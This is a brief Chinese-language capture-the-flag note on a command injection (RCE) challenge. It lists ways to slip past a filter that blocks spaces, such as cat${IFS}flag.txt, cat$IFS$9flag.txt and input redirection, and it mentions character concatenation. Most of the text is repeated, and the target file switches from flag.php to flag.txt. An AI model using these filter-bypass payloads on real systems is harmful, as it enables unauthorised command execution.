打开网站
测试漏洞:RCE
使用ls获得flag.php
使用cat flag.php 空格被过滤
绕过空格过滤
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
绕过字符过滤
使用字符拼接
测试漏洞:RCE
使用ls获得flag.php
使用cat flag.php 空格被过滤
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
使用字符拼接